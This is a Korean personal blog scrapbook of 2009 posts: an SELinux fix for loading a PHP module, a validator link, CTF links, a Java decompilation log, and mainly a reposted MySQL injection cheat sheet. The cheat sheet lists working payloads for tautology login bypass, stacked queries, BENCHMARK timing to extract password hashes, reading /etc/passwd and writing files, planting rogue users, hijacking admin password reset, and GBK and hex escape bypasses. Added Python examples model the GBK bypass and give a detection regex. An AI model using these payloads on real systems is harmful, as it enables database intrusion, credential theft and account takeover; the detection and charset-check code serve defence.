Source: http://plzu.tistory.com/55

I was installing PHP and trying to hook it up to Apache when an out-of-the-blue error appeared.

httpd: Syntax error on line 53 of /usr/local/apache/conf/httpd.conf:
Cannot load /usr/local/apache/modules/libphp5.so into server: /usr/local/apache/modules/libphp5.so: cannot restore segment prot after reloc: Permission denied


restorecon -R -v /usr/local/apache/modules/libphp5.so

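Since it was segment-related, I tried restoring the file to its default settings, but the same error appears.

Hmm... what could the problem be...
Searching Google, I found many people in the same situation.
It looks like this should be treated as a context error rather than a file setting.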

chcon -t texrel_shlib_t /usr/local/apache/modules/libphp5.so
Posted by 김주일
System/System General 2009. 3. 19. 11:21
Source: http://validator.kldp.org/

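This validator is the Korean-language W3C HTML Validation service provided by KLDP; it checks the markup validity of web documents such as HTML, XHTML, SMIL, and MathML. If you want to check specific content such as RSS/Atom feeds or CSS style sheets, or to find broken links, refer to the other validators and tools documentation.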

Posted by 김주일

Basics.

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations.

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION()
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors.

Operators

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

Evaluate

All of these evaluate to TRUE, or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));
This takes around 5 seconds on localhost.

SELECT BENCHMARK(1000000,MD5(CHAR(116)))
This takes around 7 seconds on localhost.

SELECT BENCHMARK(10000000,MD5(CHAR(116)))
This takes around 70 seconds on localhost.

Using the timeout to check if user exists

SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of the N rounds: add an extra zero and it could stall or crash your browser!

Gathering info

Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors

Writing info into files

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))
INTO OUTFILE
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))

Note: You must specify a new file (it must not already exist) and give the correct pathname!

The CHAR() quoteless function

SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))

SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

example:

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login

Explanation: the SUBSTRING arguments are (passwordfield, startcharacter, selectlength)

(password,1,2) selects: 'ab'
(password,1,3) selects: 'abc'
(password,1,4) selects: 'abcd'

A quoteless example:

SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible chars: 0 to 9 (ASCII 48 to 57) and a to z (ASCII 97 to 122)

Misc

Insert a new user into DB

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user

load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp

SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for “forgot login retrieval.”

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

Bypassing addslashes() with GBK encoding

WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK

"injection string"
に関する追加情報:

the above chars are Chinese Big5
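
Why the 0xbf27 byte pair above defeats byte-wise escaping, as an added example that is not from the original cheat sheet: addslashes() inserts 0x5c before the quote, and a GBK reader then takes 0xbf5c as one character, leaving the quote live. The function names are hypothetical, `addslashes` is a Python model of the PHP function, and latin-1 stands in for a single-byte reading of the same bytes.

```python
def addslashes(raw: bytes) -> bytes:
    """Byte-wise model of PHP addslashes(): backslash before ', " and \\; NUL becomes \\0."""
    out = bytearray()
    for b in raw:
        if b == 0x00:
            out += b"\\0"
        else:
            if b in (0x27, 0x22, 0x5C):
                out.append(0x5C)
            out.append(b)
    return bytes(out)


def live_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes that are not backslash-escaped when read in `charset`."""
    text = escaped.decode(charset, errors="replace")
    count = i = 0
    while i < len(text):
        if text[i] == "\\":
            i += 2          # the backslash consumes the next character
            continue
        count += text[i] == "'"
        i += 1
    return count


def valid_in_charset(raw: bytes, charset: str) -> bool:
    """Defensive check: accept input only if it is well-formed in the connection charset."""
    try:
        raw.decode(charset)
        return True
    except UnicodeDecodeError:
        return False


# Constructed input: the 0xbf27 byte pair from the line above, followed by text.
PAYLOAD = b"\xbf\x27admin"
ESCAPED = addslashes(PAYLOAD)

if __name__ == "__main__":
    print(ESCAPED.hex(" ", 1))
    print("latin-1 view, live quotes:", live_quotes(ESCAPED, "latin-1"))
    print("gbk view, live quotes:    ", live_quotes(ESCAPED, "gbk"))
    print("input well-formed in gbk: ", valid_in_charset(PAYLOAD, "gbk"))
```

Rejecting input that is not well-formed in the connection charset, or binding the value as a statement parameter, removes the mismatch between what the escaper saw and what the server parses.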

Advanced Vectors

Using a hex-encoded query to bypass escaping.

Normal:

SELECT * FROM login WHERE user = 'root'

Bypass:

SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal:

insert into login set user = 'root', pass = 'root'

Bypass:

insert into login set user = 0x726F6F74, pass = 0x726F6F74

How to determine the HEX value for injection.

SELECT HEX('root');

gives you:

726F6F74

then add:

0x

before it.
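
The forms catalogued in this cheat sheet (comment-split keywords, tautologies, stacked queries, BENCHMARK timing, file reads and writes, CHAR() and hex literals) expressed as detection logic over request parameter values; this is an added example, not part of the original cheat sheet. The rule names and sample values are constructed for illustration.

```python
import re

# Inline MySQL comments, used on this page to split keywords (WHE/**/RE, o/**/r).
COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Hypothetical rule names; each pattern targets one family from the cheat sheet.
RULES = {
    "tautology": re.compile(r"\bor\s+(\d+)\s*=\s*\1\b", re.I),
    "stacked_query": re.compile(r";\s*(select|show|insert|update|delete)\b", re.I),
    "timing_benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "file_io": re.compile(r"\binto\s+outfile\b|\bload\s+data\s+infile\b", re.I),
    "quoteless_char": re.compile(r"\bchar\s*\(\s*\d+", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{4,}\b", re.I),
}


def classify(value):
    """Return the sorted rule names matched by one request parameter value."""
    # Check both readings of a comment: deleted outright and treated as whitespace.
    forms = (COMMENT.sub("", value), COMMENT.sub(" ", value))
    return sorted({name for form in forms
                   for name, rx in RULES.items() if rx.search(form)})


# Constructed parameter values, built from fragments listed on this page.
SAMPLES = [
    "42",
    "1 or 1=1",
    "1 o/**/r 1=1 A/**/ND user L/**/IKE \"%root%\"",
    "1 or 1=1; SHOW TABLES",
    "IF(user = 'root', BENCHMARK(1000000,MD5('x')),NULL)",
    "CHAR(39,97,39)",
    "0x726F6F74",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{classify(s) or ['clean']!s:40} {s}")
```

Without the comment-stripping step the tautology rule misses `o/**/r 1=1`. Rules such as `hex_literal` also fire on legitimate values, so hits are signals for review alongside bound parameters in the application, not a replacement for them.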

Source: http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

Posted by 김주일
My Own Space/Scrap 2009. 3. 15. 14:18
Wow~

Ooh~

They're so good~

I'm jealous~



Source: http://vnsecurity.net/Members/lamer/archive/2009/03/11/codegate2009/
Posted by 김주일
System/Windows Security 2009. 3. 14. 17:40
p. 176. Found this while looking for COMRaider. Geez.. since there's no information out there..
This is handy..



Source: http://labs.idefense.com/
Posted by 김주일

Related to p. 167


C:\Documents and Settings\Administrator\바탕 화면>jad.exe HeaderStyle.class
Parsing HeaderStyle.class...The class file version is 48.0 (only 45.3, 46.0 and
47.0 are supported)
Overwrite HeaderStyle.jad [y/n/a/s] ? y
 Generating HeaderStyle.jad

C:\Documents and Settings\Administrator\바탕 화면>type HeaderStyle.jad
// Decompiled by Jad v1.5.8d. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3)
// Source File Name:   HeaderStyle.java

package com.jgoodies.looks;

import javax.swing.*;

public final class HeaderStyle
{

    private HeaderStyle(String name)
    {
        this.name = name;
    }

    public static HeaderStyle from(JMenuBar menuBar)
    {
        return from0(menuBar);
    }

    public static HeaderStyle from(JToolBar toolBar)
    {
        return from0(toolBar);
    }

    private static HeaderStyle from0(JComponent c)
    {
        Object value = c.getClientProperty("jgoodies.headerStyle");
        if(value instanceof HeaderStyle)
            return (HeaderStyle)value;
        if(value instanceof String)
            return valueOf((String)value);
        else
            return null;
    }

    private static HeaderStyle valueOf(String name)
    {
        if(name.equalsIgnoreCase(SINGLE.name))
            return SINGLE;
        if(name.equalsIgnoreCase(BOTH.name))
            return BOTH;
        else
            throw new IllegalArgumentException("Invalid HeaderStyle name " + name);
    }

    public String toString()
    {
        return name;
    }

    public static final HeaderStyle SINGLE = new HeaderStyle("Single");
    public static final HeaderStyle BOTH = new HeaderStyle("Both");
    private final String name;

}

C:\Documents and Settings\Administrator\바탕 화면>

Posted by 김주일